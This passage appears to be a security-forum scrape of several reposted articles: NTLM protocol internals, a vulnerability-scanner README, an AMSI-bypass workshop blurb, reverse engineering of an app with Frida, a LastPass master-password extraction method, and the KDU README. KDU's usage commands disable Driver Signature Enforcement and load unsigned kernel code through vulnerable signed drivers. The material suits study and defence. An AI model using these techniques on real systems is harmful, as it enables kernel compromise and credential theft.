‘S’, ‘P’, ‘\0’). 4 – The server responds to the request by sending an NTLM challenge 5 – The client then encrypts that challenge with his own pre-entered password’s hash and sends his username, challenge and challenge-response back to the server (another data is being sent while using NetNTLM-v2). 6 – The server tries to encrypt the challenge as well using its own copy of the user’s hash which is stored locally on the server in case of local authentication or pass the information to the domain controller in case of domain authentication, comparing it to the challenge-response, if equal then the login is successful. 1-2 : negotiation request/response launch Wireshark and initiate the negotiation process using the following python lines from impacket.smbconnection import SMBConnection, SMB_DIALECT myconnection = SMBConnection("jnkfo","192.168.18.139") These couple lines represent the 1st two negotiation steps of the previous picture without proceeding with the authentication process. Using the “smb or smb2” filter During the negotiation request, you will notice that the client was negotiating over SMB protocol, and yet the server replied using SMB2 and renegotiated again using SMB2! It’s simply the Dialects. By inspecting the packet you will find the following As mentioned earlier, the client is offering the Dialects it supports and the server picks up whatever it wants to use, by default it picks up the one with the highest level of functionality that both client and server supports. If the best is SMB2 then let it be SMB2. You can, however, enforce a certain dialect (assuming the server supports it) using Myconnection.negotiateSession(preferredDialect=”NT LM 0.12”) The dialect NT LM 0.12 was sent, the server responded back using SMB, and will use the same protocol for the rest of the authentication process. Needless to say that LM response isn’t supported by default anymore since windows vista/windows server 2008. 3 – Session Setup Request (Type 1 message) The following line will initiate the authentication process. myconnection.login("Administrator", "P@ssw0rd") The “Session Setup Request” packet contains information such as the [‘N’, ‘T’, ‘L’, ‘M’, ‘S’, ‘S’, ‘P’, ‘\0’] signature, negotiation flags indicating the options supported by the client and the NTLM Message Type which must be 1 An interesting Flag is the NTLMSSP_NEGOTIATE_TARGET_INFO flag which will ask the server to send back some useful information as will be seen in step number 4 Another interesting flag is the NEGOTIATE_SIGN which has a great deal with the relay attacks as will be mentioned later. 4 – Session Setup Response (Type 2 message) At the response, we get back the NTLMSSP signature again. The message type must be 2 in this case. Target name and the target info due to the NTLMSSP_NEGOTIATE_TARGET_INFO flag we sent earlier which provides us with some wealthy information about the target! A good example is getting the domain name of exchange servers externally. The most important part is the NTLM challenge or nonce. 5 – Session Setup Request (Type 3 message) Long story short, the client needs to prove that he knows the user’s password, without sending the plaintext password or even the NTLM hash directly over the network. So instead it goes through a procedure in which it creates NT-hash, uses this to encrypt the server’s challenge, sends this back along with the user name to the server. That’s how the process works in general. At NTLMv2, The client hashes the user’s pre-entered plain text password into NTLM using the pre-mentioned algorithm to proceed with the challenge-response generation. The elements of the NTLMv2 hash are – The upper-case username – The domain or target name. HMAC-MD5 is applied to this combination using the NTLM hash of the user’s password, which makes the NTLMv2 hash. A blob block is then constructed containing – Timestamp – Client nonce (8 bytes) – Target information block from type 2 message This blob block is concatenated with the challenge from type 2 message and then encrypted using the NTLMv2 hash as a key via HMAC-MD5 algorithm. Lastly, this output is concatenated with the previously constructed blob to form the NTLMv2-SSP challenge-response (type 3 message) so basically the NTLMv2_response = HMAC-MD5(text(challenge + blob), using NTLMv2 as a key) and the challenge response is NTLMv2_response + blob. Out of curiosity and just to know the difference between the ntlmv1 and v2, How is NTLMv1 response calculated?! 1 – The NTLM hash of the plaintext password is calculated as pre-mentioned, using the MD5 algorithm, so assuming that the password is P@ssw0rd, the NTLM hash will be E19CCF75EE54E06B06A5907AF13CEF42 2 – These 16 bytes are then padded to 21 bytes, so it becomes E19CCF75EE54E06B06A5907AF13CEF420000000000 3 – This value is split into three 7 bytes thirds 0xE19CCF75EE54E0 0x6B06A5907AF13C 0xEF420000000000 4 – These 3 values are used to create three 64 bits DES keys by adding parity bits after every 7 bits as usual So for the 1st key 0xE19CCF75EE54E0 11100001 10011100 11001111 01110101 11101110 01010100 11100000 8 parity bits will be added so it becomes 111000001 100111000 110010111 011100101 111001110 010010100 1011000000 In Hex : 0xE0CE32EE5E7252C0 Same goes with the other 2 keys 5 – Each of the three keys is then used to encrypt the challenge obtained from Message type 2. 6 – The 3 results are combined to form the 24-byte NTLM response. So in NTLMv1, there is no client nonce or timestamp being sent to the server, keep that in mind for later. 6 – Session Setup Response The server receives type 3 message which contains the challenge-response The server has its own copy of the user’s NTLM hash, challenge, and all the other information needed to calculate its own challenge-response message. The server then compares the output it has generated with the output it got from the client. Needless to say, if the NT-Hash used to encrypt the data on the client-side, it differs from the user’s password’s NT-hash stored on the server (The user entered the wrong password), the challenge-response won’t be the same as the server’s output. And thus user get ACCESS_DENIED or LOGON_FAILURE message Unlike if the user entered the correct password, the NT-Hash will be the same, and the encryption (challenge-response) result will be the same on both sides and then the login will succeed. That’s how the full authentication process happened without directly sending or receiving the NTLM hash or the plaintext password over the network. NTLM authentication in a windows domain environment The process is the same as mentioned before except for the fact that domain users credentials are stored on the domain controllers So the challenge-response validation [Type 3 message] will lead to establishing a Netlogon secure channel with the domain controller where the passwords are saved. The server will send the domain name, username, challenge, and the challenge-response to the domain controller which will determine if the user has the correct password or not based on the hash saved at the NTDS file (unlike the previous scenario in which the hash was stored locally on the SAM). So from the server-side, you will find the following 2 extra RPC_NETLOGON messages to and from the Domain controller. and if everything is ok it will just send the session key back to the server in the RPC_NETLOGON response message. NTLMSSP To fully understand that mechanism you can’t go without knowing a few things about NTLMSSP, Will discuss this in brief and dig deeper into it during the attacks part. From Wikipedia NTLMSSP (NT LAN Manager (NTLM) Security Support Provider) is a binary messaging protocol used by the Microsoft Security Support Provider Interface (SSPI) to facilitate NTLM challenge-response authentication and to negotiate integrity and confidentiality options. NTLMSSP is used wherever SSPI authentication is used including Server Message Block / CIFS extended security authentication, HTTP Negotiate authentication (e.g. IIS with IWA turned on) and MSRPC services. The NTLMSSP and NTLM challenge-response protocol have been documented in Microsoft’s Open Protocol Specification. SSP is a framework provided by Microsoft to handle that whole NTLM authentication and integrity process, Let’s repeat the previous authentication process in terms of NTLMSSPI 1 – The client gets access to the user’s credentials set via AcquireCredentialsHandle function 2 – The Type 1 message is created by calling InitializeSecurityContext function in order to start the authentication negotiation process which will obtain an authentication token and then the message is forwarded to the server, that message contains the NTLMSSP 8 bytes signature mentioned before. 3 – The server receives the “Type 1 message“, extracts the token and passes it to the AcceptSecurityContext function which will create a local security context representing the client and generate the NTLM challenge and send it back to the client (Type 2 message). 4 – The client extracts the challenge, passes it to InitializeSecurityContext function which creates the Challenge-response (Type 3 message) 5 – The server passes the Type 3 message to the AcceptSecurityContext function which validates if the user authenticated or not as mentioned earlier. These function/process has nothing to do with the SMB protocol itself, they are related to the NTLMSSP, so they’re called whenever you’re triggering authenticating using NTLMSSP no matter the service you’re calling. How does NTLMSSP assure integrity? To assure integrity, SSP applies a Message Authentication Code to the message. This can only be verified by the recipient and prevent the manipulation of the message on the fly (in a MITM attack for example) The signature is generated using a secret key by the means of symmetric encryption, and that MAC can only be verified by a party possessing the key (The client and the server). That key generation varies from NTLMv1 to NTLMv2 At NTLMv1 the secret key is generated using MD4(NTHash) At NTLMv2 1 – The NTLMv2 hash is obtained as mentioned earlier 2 – The NTLMv2 blob is obtained as also mentioned earlier 3 – The server challenge is concatenated with the blob and encrypted with HMAC-MD5 using NTLMv2 hash as a key 4 – That output is encrypted again with HMAC-MD5 using again NTLMv2 hash as a key HMAC-MD5(NTLMv2, OUTPUT_FROM_STEP_3) And that’s the session key You’ll notice that to generate that key it requires to know the NThash in both cases, either in NTLMv1 or NTLMv2, the only sides owning that key are the client and the server. The MITM doesn’t own it and so can’t manipulate the message. This isn’t always the case for sure, and it has it’s own pre-requirements and so it’s own drops which will be discussed in the next parts where we’re going to dig deeper inside the internals of the authentication/integrity process in order to gain more knowledge on how these features are abused. Conclusion and references We’ve discussed the difference between LM, NTHash, NTLMv1 and NTLMv2 hashes. I went through the NTLM authentication process and made a quick brief about the NTLMSSP’s main functions. In the next parts, we will dig deeper into how NTLMSSP works and how can we abuse the NTLM authentication mechanism. If you believe there is any mistake or update that needs to be added, feel free to contact me at Twitter. References The NTLM Authentication Protocol and Security Support Provider Mechanics of User Identification and Authentication: Fundamentals of Identity Management [MS-NLMP]: NT LAN Manager (NTLM) Authentication Protocol LM, NTLM, Net-NTLMv2, oh my! Sursa: https://blog.redforce.io/windows-authentication-and-attacks-part-1-ntlm/
  9. Deepfence Runtime Threat Mapper The Deepfence Runtime Threat Mapper is a subset of the Deepfence cloud native workload protection platform, released as a community edition. This community edition empowers the users with following features: Visualization: Visualize kubernetes clusters, virtual machines, containers and images, running processes, and network connections in near real time. Runtime Vulnerability Management: Perform vulnerability scans on running containers & hosts as well as container images. Container Registry Scanning: Check for vulnerabilities in images stored on Docker private registry, AWS ECR, Azure Container Registry and Harbor registries. Support for more container registries including JFrog, Google container registrywill be added soon to the community edition. CI/CD Scanning: Scan images as part of existing CI/CD Pipelines like CircleCI, Jenkins. Integrations with SIEM, Notification Channels & Ticketing: Ready to use integrations with Slack, PagerDuty, HTTP endpoint, Jira, Splunk, ELK, Sumo Logic and Amazon S3. Live Demo https://community.deepfence.show/ Username: community@deepfence.io Password: mzHAmWa!89zRD$KMIZ@ot4SiO Contents Architecture Features Getting Started Deepfence management Console Pre-Requisites Installation Deepfence Agent Pre-Requisites Installation Deepfence Agent on Standalone VM or Host Deepfence Agent on Amazon ECS Deepfence Agent on Google GKE Deepfence Agent on Self-managed/On-premise Kubernetes How do I use Deepfence? Register a User Use case - Visualization Use Case - Runtime Vulnerability Management Use Case - Registry Scanning Use Case - CI/CD Integration Use Case - Notification Channel and SIEM Integration API Support Security Support Architecture A pictorial depiction of the Deepfence Architecture is below Feature Availability Features Runtime Threat mapper (Community Edition) Workload Protection Platform (Enterprise Edition) Discover & Visualize Running Pods, Containers and Hosts ✔️ (upto 100 hosts) ✔️ (unlimited) Runtime Vulnerability Management for hosts/VMs ✔️ (upto 100 hosts) ✔️ (unlimited) Runtime Vulnerability Management for containers ✔️ (unlimited) ✔️ (unlimited) Container Registry Scanning ✔️ ✔️ CI/CD Integration ✔️ ✔️ Multiple Clusters ✔️ ✔️ Integrations with SIEMs, Slack and more ✔️ ✔️ Compliance Automation ❌ ✔️ Deep Packet Inspection of Encrypted & Plain Traffic ❌ ✔️ API Inspection ❌ ✔️ Runtime Integrity Monitoring ❌ ✔️ Network Connection & Resource Access Anomaly Detection ❌ ✔️ Workload Firewall for Containers, Pods and Hosts ❌ ✔️ Quarantine & Network Protection Policies ❌ ✔️ Alert Correlation ❌ ✔️ Serverless Protection ❌ ✔️ Windows Protection ❌ ✔️ Highly Available & Multi-node Deployment ❌ ✔️ Multi-tenancy & User Management ❌ ✔️ Enterprise Support ❌ ✔️ Getting Started The Deepfence Management Console is first installed on a separate system. The Deepfence agents are then installed onto bare-metal servers, Virtual Machines, or Kubernetes clusters where the application workloads are deployed, so that the host systems, or the application workloads, can be scanned for vulnerabilities. A pictorial depiction of the Deepfence security platform is as follows: Deepfence Management Console Pre-Requisites Feature Requirements CPU: No of cores 8 RAM 16 GB Disk space At-least 120 GB Port range to be opened for receiving data from Deepfence agents 8000 - 8010 Port to be opened for web browsers to be able to communicate with the Management console to view the UI 443 Docker binaries At-least version 18.03 Docker-compose binary Version 1.20.1 Installation Installing the Management Console is as easy as: Download the file docker-compose.yml to the desired system. Execute the following command docker-compose -f docker-compose.yml up -d This is the minimal installation required to quickly get started on scanning various container images. The necessary images may now be downloaded onto this Management Console and scanned for vulnerabilities. Deepfence Agent In order to check a host for vulnerabilities, or if docker images or containers that have to be checked for vulnerabilities are saved on different hosts, then the Deepfence agent needs to be installed on those hosts. Pre-Requisities Feature Requirements CPU: No of cores 2 RAM 4 GB Disk space At-least 30 GB Connectivity The host on which the Deepfence Agent is to be installed, is able to communicate with the Management Console on port range 8000-8010. Linux kernel version >= 4.4 Docker binaries At-least version 18.03 Deepfence Management Console Installed on a host with IP Address a.b.c.d Installation Installation procedure for the Deepfence agent depends on the environment that is being used. Instructions for installing Deepfence agent on some of the common platforms are given in detail below: Deepfence Agent on Standalone VM or Host Installing the Deepfence Agent is now as easy as: In the following docker run command, replace x.x.x.x with the IP address of the Management Console docker run -dit --cpus=".2" --name=deepfence-agent --restart on-failure --pid=host --net=host --privileged=true -v /var/log/fenced -v /var/run/docker.sock:/var/run/docker.sock -v /:/fenced/mnt/host/:ro -v /sys/kernel/debug:/sys/kernel/debug:rw -e DF_BACKEND_IP="x.x.x.x" deepfenceio/deepfence_agent_ce:latest Deepfence Agent on Amazon ECS For detailed instructions to deploy agents on Amazon ECS, please refer to our Amazon ECS wiki page. Deepfence Agent on Google GKE For detailed instructions to deploy agents on Google GKE, please refer to our Google GKE wiki page. Deepfence Agent on Self-managed/On-premise Kubernetes For detailed instructions to deploy agents on Google GKE, please refer to our Self-managed/On-premise Kubernetes wiki page. How do I use Deepfence? Now that the Deepfence Security Platform has been successfully installed, here are the steps to begin -- Register a User The first step is to register a user with the Management Console. If the Management Console has been installed on a system with IP address x.x.x.x, fire up a browser (Chromium (Chrome, Safari) is the supported browser for now), and navigate to https://x.x.x.x/ After registration, it can take anywhere between 30-60 minutes for initial vulnerability data to be populated. The download status of the vulnerability data is reflected on the notification panel. Use case - Visualization You can visualize the entire topology of your running VMs, hosts, containers etc. from the topology tab. You can click on individual nodes to initiate various tasks like vulnerability scanning. Use Case - Runtime Vulnerability Management From the topology view, runtime vulnerability scanning for running containers & hosts can be initiated using the console dashboard, or by using the APIs. Here is snapshot of runtime vulnerability scan on a host node. The vulnerabilities and security advisories for each node, can be viewed by navigating to Vulnerabilities menu as follows: Clicking on an item in the above image gives a detailed view as in the image below: Optionally, users can tag a subset of nodes using user defined tags and scan a subset of nodes as explained in our user tags wiki page. Use Case - Registry Scanning You can scan for vulnerabilities in images stored in Docker private registry, AWS ECR, Azure Container Registry and Harbor from the registry scanning dashboard. First, you will need to click the "Add registry" button and add the credentials to populate available images. After that you can select the images to scan and click the scan button as shown the image below: Use Case - CI/CD Integration For CircleCI integration, refer to our CircleCI wiki and for Jenkins integration, refer to our Jenkins wiki page for detailed instructions. Use Case - Notification Channel and SIEM Integration Deepfence logs and scanning reports can be routed to various SIEMs and notifications channels by navigating to Notifications screen. For detailed instructions on integrations with slack refer to our slack wiki page For detailed instructions on integrations with sumo logic refer to our sumo logic wiki page For detailed instructions on integrations with PagerDuty refer to our PagerDuty wiki page API Support Deepfence provides a suite of powerful API’s to control the features, and to extract various reports from the platform. The documentation of the API’s are available here, along with sample programs for Python and GO languages. Security Users are strongly advised to control access to the Deepfence Management Console, so that it is only accessible on port range 8000-8010 from those systems that have installed the Deepfence agent. Further, we recommend to open port 443 on the Deepfence Management Console only for those systems that need to use a Web Browser to access the Management Console. We periodically scan our own images for vulnerabilities and pulling latest images should always give you most secure Deepfence images. In case you want to report a vulnerability in the Deepfence images, please reach out to us by email -- (community at deepfence dot io). Support Please file Github issues as needed. Sursa: https://github.com/deepfence/ThreatMapper
      • 1
      • Upvote
  10. DEF CON 27 Workshop Microsoft is constantly adapting its security to counter new threats. Specifically, the introduction of the Microsoft Antimalware Scripting Interface (AMSI) and its integration with Windows Defender has significantly raised the bar. In this hands-on class, we will learn the methodology behind obfuscating malware and avoiding detection. Students will explore the inner workings of Windows Defender and learn to employ AMSI bypass techniques and obfuscate malware using Visual Basic (VB) and Powershell. Then identify and evade sandbox environments to ensure the payloads are masked when arriving at the intended target. The final capstone will be tying all the concepts together. In this workshop we will: 1. Introduce AMSI and explain its importance 2. Learn to analyze malware scripts before and after execution 3. Understand how to obfuscate code to avoid AMSI and Windows Defender 4. Detect and avoid sandbox environments https://github.com/BC-SECURITY/DEFCON27
  11. Reverse Engineering the Australian Government’s Coronavirus iOS application Richard Nelson Apr 6 · 5 min read On the 29th of March, the Australian Government launch their Coronavirus app. It’s a pretty neat little app with lots of useful features, including data on the current status of the number of COVID-19 cases in Australia, broken down by state: I’ve been wondering where this data is and how to access it programatically. With a native application fetching this data, the answer must be inside! I found the process of discovery interesting, so I’ve documented my efforts in the hope that it’s of interest to others. The first thing I would try when presented with something like this is to simply proxy through an app like Burp Suite, Proxyman or mitmproxy. These are all capable of capturing https and secure websockets. I used mitmproxy in transparent proxy mode, and setting up my device to use my macbook as the router to force all traffic through it (not through the Proxy settings on the device). But when capturing, minimal traffic shows up (there’s a bit more on first app run and if refresh tokens or remote-config are required, but not a lot): Worse, the following appears: Warn: 192.168.86.25:51981: Client Handshake failed. The client may not trust the proxy’s certificate for firestore.googleapis.com. However, this does give a couple of good pieces of information: This app uses Firebase’s Firestore database. Maybe the data is there? Firestore has pretty good SSL cert pinning, because traditional off-the-shelf cert pinning removal didn’t appear to work. So the next step is to ssh to a jailbroken iPhone with the app installed and poke around a bit. The first thing I noticed was GoogleService-Info.plist in the root directory of the application. When integrating the Firebase SDK in an iOS application, it helpfully provides a plist file with all the configuration for your project, which gets embedded in the app for the SDK to read. This contains project ids, API keys, etc. Useful: Good news: The Australian government doesn’t send application analytics off to Google willy-nilly. It also shows us the firestore database URL. This is a good start, but we don’t know how the data is structured in Firestore (or even if it’s actually there). It could be in various collections and documents, so it requires more digging to find out what the names of those are before we can attempt to read the data for ourselves. Filtered mangled symbols displayed from Ghidra The next step was to extract the ipa from the device and have a look at any other configuration files, load it up in Ghidra and see if there’s anything glaring. This did present some useful info on how the app is structured — what View Controllers and View Models there are (and the name of the developer who’s build machine it ran on), but there was nothing obvious in the strings section around collection or document paths, and sifting through the status view controller and co. started to become time consuming. I also considered patching the binary to remove cert pinning, but there had to be an easier way first. In steps Frida. Frida allows us to dynamically trace, hook, and inject code at runtime. My thinking here was to hook the Firestore methods for retrieving collections and documents and print out the arguments. The first step was to confirm that these methods are called, which will hint that it’s actually using it for the app data. Fortunately I’ve used Firestore in my own project so was slightly familiar with the APIs. Using frida-trace, we can get it to show when these functions are called: % frida-trace -U -m "*[FIR* *collection*]" -m "*[FIR* *document*]" -f au.gov.health.covid19 Instrumenting functions... Started tracing 16 functions. Press Ctrl+C to stop. /* TID 0x503 */ 1651 ms -[FIRFirestore collectionWithPath:0xdb39cb061878d20a] 1659 ms -[FIRCollectionReference documentWithPath:0x2813caeb0] This is great! We can see here that it pulls a collection and a document from Firestore, but we can’t yet see the arguments. The same output occurs when tapping into the “Current status” section. These two functions both take strings as their only argument; the collection path and document respectively. So I wrote a frida script to simply print them out: Script to hook two Firebase methods This results in the following: % frida --no-pause -U -l coronavirus.js -f au.gov.health.covid19[iPhone::au.gov.health.covid19]-> [FIRFireStore collectionWithPath:@"<redacted>"][FIRCollectionReference documentWithPath:@"<redacted>"]**tap "Current status" section**[FIRFireStore collectionWithPath:@"<redacted collection>"][FIRCollectionReference documentWithPath:@"<redacted document>"] Now we have enough information to get the data ourselves: Javascript. Don’t ask. The output of this is interesting: Apart from the actual status data, there’s a whole lot of backend-for-frontend data for how the app should display sections from the second document. This is pretty neat, and how more and more applications are being developed. Interestingly, I cannot find any reference to a string of the collection with the numbers in the application. This could either be because it’s hidden on purpose, or because I didn’t look hard enough. Either way, it doesn’t really matter. Conclusion & Application We can now use this to, for example, write a Slack bot that sends updates as soon as new data is in Firestore. Using Google’s Firestore is an interesting choice, and it’s nice to see it used well in what I presume is a heavily used application. This app is well written, and doesn’t look like it was something very quickly thrown together and rushed to the App Store (perhaps it was, well done). Inspecting the network traffic was a problem, and I went down a few rabbit holes (e.g. trying to use my JWT token from my application to use Firestore REST apis) that aren’t documented here. I have almost no suggestions to the developers on how to improve things here. The API keys simply must be in the app in some fashion, so as long as permissions and scope on them are suitable then it’s really not an issue. 👍 I’ve shown how we can reverse engineer an application in order to replicate functionality, or fetch application data for ourselves. When an app doesn’t require user authentication to fetch data, it’s always going to be possible for someone determined enough to be able to inspect. My advice is to simply go with the assumption that the client is always an untrusted environment. Ensure your APIs are secure on the server side and able to deal with various types of abuse. Sursa: https://medium.com/@wabz/reverse-engineering-the-australian-governments-coronavirus-ios-application-c08790e895e9
  12. Breaking LastPass: Instant Unlock of the Password Vault April 6th, 2020 by Oleg Afonin Category: «Elcomsoft News», «GPU acceleration», «Tips & Tricks» 71 153 1 57 282 Shares Password managers such as LastPass are designed from the ground up to withstand brute-force attacks on the password database. Using encryption and thousands of hash iterations, the protection is made to slow down access to the encrypted vault that contains all of the user’s stored passwords. In this article, we’ll demonstrate how to unlock LastPass password vault instantly without running a length attack. LastPass Introduced by Marvasol Inc (acquired by LogMeIn) in 2008, LastPass is one of the four most popular password managers. Similar to other password managers, LastPass is designed to store, manage and synchronize passwords, which supposedly helps using complex, unique and non-reusable passwords for the many online accounts without having to memorize all of them. LastPass offers desktop apps for Windows and macOS, as well as mobile apps for iOS and Android. More interestingly, LastPass can be installed on multiple platforms as a cross-platform browser extension in many popular browsers. LastPass collects and stores user’s passwords in a local database. The database can be encrypted with a master password. Due to the sensitive nature of the information stored in the password vault, LastPass applies strong encryption and uses multiple rounds of hashing to slow down potential brute-force attacks. Similar to other password managers, LastPass may use different protection settings to protect password vaults on different platforms, desktop apps carrying the strongest protection and Android app using the weakest protection. Technically speaking, LastPass keeps all passwords along with other authentication credentials in a SQLite database. The database is secured with a password, which, in turn, is used to generate the encryption key after going through some 5,000 to about 100,000 rounds of hashing depending on the platform. For security reasons, desktop platforms offer the best protection. The LastPass database we obtained from a Windows computer was protected with 100,100 hash iterations. Attacking the database directly would result in the following speeds: The attack speed of 15,500 passwords per second using a GeForce 2070 GPU is about average, offering reasonable protection of the password database if the user sets a long, complex master password that is not based on combinations of dictionary words. Since most customers use their mobile devices to access accounts and open documents, LastPass also offers mobile apps on both iOS and Android platforms. The common property of these platforms is the touch screen. Unlike physical keyboards, touch screens don’t have the “motor learning” property; as such, they aren’t the best when it comes to entering long and complex passwords. This results in simpler master passwords selected by users who frequently unlock their protected vaults on mobile devices. While Touch ID or Face ID do help avoid typing in the master password, but authentication with a master password is still required from time to time. LastPass password databases can be also acquired from Android and iOS devices (file system level access required with unc0ver or rootless extraction). On Android, LastPass uses weaker protection with only 5000 rounds of hashing. Correspondingly, the attack speeds are significantly higher compared to the Windows version – yet obtaining root access or imaging the file system of an Android device may be difficult or impossible. The brute-force speed of LastPass password databases obtained from Android devices can reach some 309,000 passwords per second if one uses a single NVIDIA GeForce 2070 GPU. We consider this speed relatively high. The attack of 309,000 passwords per second allows recovering complex master passwords in reasonable time. For example, a 7-character password containing some digits, small and capital letters but no special characters (typical for mobile devices) can be recovered in less than three months, while breaking a shorter 6-character password with the same properties can take less than 3 days. There is, however, one special case where no brute force is required to unlock the protected vault. The Chrome Extension LastPass can be installed as an extension in Google Chrome and the new Chromium-based Microsoft Edge browsers. The browser extension offers what’s arguably the most convenient way to automatically fill passwords on Web pages. Since most passwords protect online resources, many users skip the desktop app and use the Chrome extension exclusively. LastPass advertises the same level of security for protecting the user’s password database in the Chrome extension: Only you know your master password, and only you can access your vault. Your master password is never shared with LastPass. That’s why millions of people and businesses trust LastPass to keep their information safe. We protect your data at every step. Source We discovered that’s not always the case. In fact, it’s almost never the case. If the user installs the Chrome extension and protects the password vault with their master password, the extension may cache the user’s master password in the main database if the user selects the “Remember password” check box. Why use the “Remember password” option? Similar to other password managers, LastPass would otherwise require the user to authenticate each session by typing in their vault password (which, by design, is supposed to be a very long and complex one). Storing the vault password in the vault itself is a natural way to spare the typing. However, it appears that LastPass does not adequately protect the master key if the “Remember password” option is selected: “The vulnerability (referred to asLastPass-Vul-1) lies in the insecure design of the master password remembering mechanism in LastPass. As shown in Figure 2, LastPass can even remember a user’s master password (with the BCPM username) into a local SQLite [40] database tableLastPassSavedLogins2, allowing the user to be automatically authenticated whenever LastPass is used again.” Source This vulnerability is still present in all recent versions of the LastPass Chrome extension (we’ve used LastPass 4.44.0 in Google Chrome 80.0.3987.146 running in Windows 10 x64). As a result, the forensic expert may be able to extract and decrypt the password vault instantly without brute-forcing the master passwords on one condition: the user had selected the “Remember password” check box. Windows Data Protection API Not Used One may argue that extracting passwords stored by the Google Chrome browser is similarly a one-click affair with third-party tools (e.g. Elcomsoft Internet Password Breaker). The difference between Chrome and LastPass password storage is that Chrome makes use of Microsoft’s Data Protection API, while LastPass does not. Google Chrome does, indeed, store user’s passwords. Similar to third-party password managers, the Windows edition of the Chrome browser encrypts passwords when stored. By default, the encrypted database is not protected with a master password; instead, Chrome employs the Data Protection API (DPAPI) introduced way back in Windows 2000. DPAPI uses AES-256 to encrypt the password data. In order to access passwords, one must sign in with the user’s Windows credentials (authenticating with a login and password, PIN code, or Windows Hello). As a result, Google Chrome password storage has the same level of protection as the user’s Windows login. This, effectively, enables someone who knows the user’s login and password or hijacks the current session to access the stored passwords. This is exactly what we implemented in Elcomsoft Internet Password Breaker. However, in order to extract passwords from Web browsers such as Chrome or Microsoft Edge, one must possess the user’s Windows login and password or hijack an authenticated session. Analyzing a ‘cold’ disk image without knowing the user’s password will not provide access to Chrome or Edge cached passwords. This is not the case for the LastPass Chrome extension (the desktop app is seemingly not affected). For the LastPass database, the attacker will not need the user’s Windows login credentials of macOS account password. All that’s actually required is the file containing the encrypted password database, which can be easily obtained from the forensic disk image. Neither Windows credentials nor master password are required. macOS has a built-in secure storage, the so-called keychain. The Mac version of Chrome does not use the native keychain to store the user’s passwords; neither does the iOS version. However, Chrome does store the master password in the corresponding macOS or iOS keychain, effectively providing the same level of protection as the system keychain. Elcomsoft Password Digger can decrypt the macOS keychain provided that the user’s logon credentials (or the separate keychain password) are known. Extracting LastPass Master Password In order to extract the user’s master password protecting the LastPass password database, we’ll use Elcomsoft Distributed Password Recovery. LastPass Chrome extension stores the protected vault at the following path (Windows 10): Windows: %UserProfile%\AppData\Local\Google\Chrome\User Data\Default\databases\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0 Launch Elcomsoft Hash Extractor (part of Elcomsoft Distributed Password Recovery) and open the file referenced above. Important: you may either access files of the currently logged in user or extract information from the disk image. The tool will automatically extract the hash file. Save the *.esprlp2 (multiple accounts) or *.esprlp (single account) hash file and open that file in Elcomsoft Distributed Password Recovery. Note: instant recovery is only available if the master password was saved. Select an account to extract the password from. Run the attack. Elcomsoft Distributed Password Recovery will find and display the master password in a matter of seconds regardless of how long and complex the master password is. Sursa: https://blog.elcomsoft.com/2020/04/breaking-lastpass-instant-unlock-of-the-password-vault/
  13. KDU Kernel Driver Utility System Requirements x64 Windows 7/8/8.1/10; Administrative privilege is required. Purpose and Features The purpose of this tool is to give a simple way to explore Windows kernel/components without doing a lot of additional work or setting up local debugger. It features: Protected Processes Hijacking via Process object modification; Driver Signature Enforcement Overrider (similar to DSEFIx); Driver loader for bypassing Driver Signature Enforcement (similar to TDL/Stryker); Support of various vulnerable drivers use as functionality "providers". Usage KDU -ps ProcessID KDU -map filename KDU -dse value KDU -prv ProviderID KDU -list -prv - optional, select vulnerability driver provider; -ps - modify process object of given ProcessID; -map - load input file as code buffer to kernel mode and run it; -dse - write user defined value to the system DSE state flags; -list - list currently available providers. Example: kdu -ps 1234 kdu -map c:\driverless\mysuperhack.sys kdu -prv 1 -ps 1234 kdu -prv 1 -map c:\driverless\mysuperhack.sys kdu -dse 0 kdu -dse 6 Run on Windows 10 20H2 (precomplied version) Compiled and run on Windows 8.1 Run on Windows 7 SP1 fully patched (precomplied version) Run on Windows 10 19H2 (precompiled version, SecureBoot enabled) Limitations of -map command Due to unusual way of loading that is not involving standard kernel loader, but uses overwriting already loaded modules with shellcode, there are some limitations: Loaded drivers MUST BE specially designed to run as "driverless"; That mean you cannot use parameters specified at your DriverEntry as they won't be valid. That also mean you can not load any drivers but only specially designed or you need to alter shellcode responsible for driver mapping. No SEH support for target drivers; There is no SEH code in x64. Instead of this you have table of try/except/finally regions which must be in the executable image described by pointer in PE header. If there is an exception occured system handler will first look in which module that happened. Mapped drivers are not inside Windows controlled list of drivers (PsLoadedModulesList - PatchGuard protected), so nothing will be found and system will simple crash. No driver unloading; Mapped code can't unload itself, however you still can release all resources allocated by your mapped code. DRIVER_OBJECT->DriverUnload should be set to NULL. Only ntoskrnl import resolved, everything else is up to you; If your project need another module dependency then you have to rewrite this loader part. Several Windows primitives are banned by PatchGuard from usage from the dynamic code. Because of unsual way of loading mapped driver won't be inside PsLoadedModulesList. That mean any callback registered by such code will have handler located in memory outside this list. PatchGuard has ability to check whatever the registered callbacks point to valid loaded modules or not and BSOD with "Kernel notification callout modification" if such dynamic code detected. In general if you want to know what you should not do in kernel look at https://github.com/hfiref0x/KDU/tree/master/Source/Examples/BadRkDemo which contain a few examples of forbidden things. Kernel traces note This tool does not change (and this won't change in future) internal Windows structures of MmUnloadedDrivers and/or PiDDBCacheTable. That's because: KDU is not designed to circumvent third-party security software or various dubious crapware (e.g. anti-cheats); These data can be a target for PatchGuard protection in the next major Windows 10 update. You use it at your own risk. Some lazy AV may flag this tool as hacktool/malware. Currently Supported Providers Intel Network Adapter Diagnostic Driver of version 1.03.0.7; RTCore64 driver from MSI Afterburner of version 4.6.2 build 15658 and below; Gdrv driver from various Gigabyte TOOLS of undefined version; ATSZIO64 driver from ASUSTeK WinFlash utility of various versions; MICSYS MsIo (WinIo) driver from Patriot Viper RGB utility of version 1.0; GLCKIO2 (WinIo) driver from ASRock Polychrome RGB of version 1.0.4; EneIo (WinIo) driver from G.SKILL Trident Z Lighting Control of version 1.00.08; WinRing0x64 driver from EVGA Precision X1 of version 1.0.2.0; EneTechIo (WinIo) driver from Thermaltake TOUGHRAM software of version 1.0.3. More providers maybe added in the future. How it work It uses known to be vulnerable driver from legitimate software to access arbitrary kernel memory with read/write primitives. Depending on command KDU will either work as TDL/DSEFix or modify kernel mode process objects (EPROCESS). When in -map mode KDU will use 3rd party signed driver from SysInternals Process Explorer and hijack it by placing a small loader shellcode inside it IRP_MJ_DEVICE_CONTROL/IRP_MJ_CREATE/IRP_MJ_CLOSE handler. This is done by overwriting physical memory where Process Explorer dispatch handler located and triggering it by calling driver IRP_MJ_CREATE handler (CreateFile call). Next shellcode will map input driver as code buffer to kernel mode and run it with current IRQL be 